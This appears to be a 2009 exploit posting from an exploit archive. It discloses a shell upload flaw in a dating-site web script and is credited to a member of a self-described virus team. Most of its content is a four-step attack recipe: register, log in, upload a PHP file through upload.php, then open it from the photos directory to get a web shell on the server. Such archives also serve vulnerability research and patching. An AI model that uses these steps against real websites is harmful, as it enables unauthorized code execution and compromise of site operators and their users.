Best Dating Script - Arbitrary File Upload

EKU-ID: 17240	CVE:	OSVDB-ID:
Author: jetli007	Published: 2009-08-18	Verified:
Download:

Rating

☆☆☆☆☆

=======================================================
+++++++++++++++++++ |Script info| +++++++++++++++++++++
=======================================================

                    [Shell Upload Vulnerability]

[-] script : bestdatingscript

[-] Site   : http://www.bestdatingscript.com



=======================================================
+++++++++++++++++++ |Author| ++++++++++++++++++++++++++
=======================================================


[+] Found by  :  jetli007

[+] C0ntact   : alkhari9007 [AT] Gmail [DOT] com

[+] Group     : Saudi Virus Team

[+] Site       : www.vxx9.cc

=======================================================
+++++++++++++++++++++++ |Exploit| +++++++++++++++++++++
=======================================================


[+] Exploit :

  - steps :

        - [1] : register in site

        - [2] : Login with ur account

        - [3] : goto http://www.127.0.0.1.com/ [path] /upload.php

        - [4] : http://www.127.0.0.1.com/ [path] /photos/Evil.php

---------------------------------------------------------------------

Greetz : Reno ; Dr.php ; !BaD BoY! ; 5D ; taishi ; ga3 wlad drb XD ; all friends [* -]

# milw0rm.com [2009-08-18]